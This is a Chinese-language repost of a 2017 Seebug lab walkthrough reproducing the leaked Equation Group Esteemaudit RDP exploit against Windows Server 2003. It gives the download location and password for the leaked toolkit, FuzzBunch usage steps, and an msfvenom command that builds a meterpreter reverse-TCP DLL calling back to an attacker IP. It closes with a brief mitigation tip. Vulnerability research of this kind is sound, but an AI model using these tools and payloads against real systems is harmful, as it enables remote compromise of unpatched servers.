专栏首页Seebug漏洞平台方程式组织泄露windows框架漏洞工具Esteemaudit RDP 漏洞

方程式组织泄露windows框架漏洞工具Esteemaudit RDP 漏洞

1.复现环境:

• windows2003 sp2 x86

• windows2003 配置域服务器

2.环境搭建:

从 https://yadi.sk/d/NJqzpqo_3GxZA4下载本次泄露的文件

在 linux下通过密码: Reeeeeeeeeeeeeee 和以下命令解压这三个文件

$ gpg windows.tar.xz.gpg

gpg: AES 加密过的数据

请输入密码:

$ tar xvf windows.tar.xz

本次泄露的众多 Exploit都存放在 windows文件夹下。将 windows文件夹拷贝到windows电脑下。

在 windows下操作步骤如下:

1. 关闭 windows防火墙

2. 下载并安装 python2.6(https://www.python.org/ftp/python/2.6.6/python-2.6.6.msi)

3. 将 python添加至环境变量中

4. 下载并安装

Pywin2.6(https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/pywin32-221.win32-py2.6.exe/download)

5. 进入 windows文件夹,在命令行下输入 mkdir listeningposts,接着运行 python fb.py 即可开始攻击

3. 漏洞利用:

我们这里运行 python fb.py,首先创建一个工程:

然后输入 use Esteemaudit加载 Esteemaudit 模块:

在这里我们选择目标架构,设置目标 IP和端口,设置完成后即可执行对目标的检测:

然后我们选择callback模式,选择对应的系统版本和callbackport:

到这里我们已经检测到目标服务器存在漏洞

这里检测到目标存在漏洞,接下来我们使用 Pcdlllauncher 来进行漏洞利用

这里我们需要用msfvenom 生成一个漏洞利用的DLL:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f dll > rdp.dll

然后载入生成的 dll文件

配置完毕 执行payload

这里我们可以在metasploit里看到 shell已经回显了

4.漏洞防护措施

到目前为止官方没有发布任何该漏洞的补丁,为保证系统安全,建议关闭智能卡登录。

本文分享自微信公众号 - Seebug漏洞平台(seebug_org),作者:sebao

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-04-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Struts S2-045漏洞热度分析

    背景介绍 Struts2官方于北京时间2017年3月6号晚上10点公布Struts2存在远程代码执行的漏洞(漏洞编号S2-045,CVE编号:CVE-2017-...

    Seebug漏洞平台
  • [紧急预警]图片噩梦,沦陷全球无数服务

    不是标题党- - 这个漏洞被命名为 ImageTragick。 知道创宇安全研究团队已经证明,一堆大服务受到这个漏洞影响,点名根本点不过来。不废话,直接看! ...

    Seebug漏洞平台
  • Sebug 联合 i 春秋&谷安网校全网首发KCon 2015视频干货

    还记得今年夏天黑客周的高潮吗?——知道创宇在北京举办的“黑无止境”KCon大会上,来自全国的黑客高手和白帽爱好者们,一起经历了三天的狂欢。 这是一个难忘的夏天,...

    Seebug漏洞平台
  • Spring Boot 使用 Log4j2 & Logback 输出日志到 EKL

    注意:本次主要演示如何在 Spring-Boot 项目中配置 Log4j2 以及 Logback 输出日志到 ELK 中,并能够在 Kibana 中可以正确检索...

    哎_小羊
  • python下使用pcl

    各路安装方法参见https://github.com/strawlab/python-pcl,在此仅记录linux下的安装: 1.安装依赖库:

    py3study
  • 数学烂也要学AI | 带你造一个经济试用版AI终极必杀器

    大数据文摘
  • 日志式文件系统

    日志文件系统(journaling file system)是一个具有故障恢复能力的文件系统,在这个文件系统中,因为对目录以及位图的更新信息总是在原始的磁盘日志...

    233333
  • requests+BeautifulSoup详解

    人生不如戏
  • 动态 | MIT推进诊断老年痴呆的认知计算,解决机器学习的黑箱问题

    毋庸置疑,人类的寿命正在变长。而伴随而来的老龄化问题,也导致了老年人可能面临认知衰退的威胁,比如老年痴呆等疾病。 根据相关机构的统计显示,美国确认患有老年痴呆的...

    AI科技评论
  • MIT推进诊断老年痴呆的认知计算,解决机器学习的黑箱问题

    毋庸置疑,人类的寿命正在变长。而伴随而来的老龄化问题,也导致了老年人可能面临认知衰退的威胁,比如老年痴呆等疾病。 根据相关机构的统计显示,美国确认患有老年痴呆的...

    AI研习社

扫码关注云+社区

领取腾讯云代金券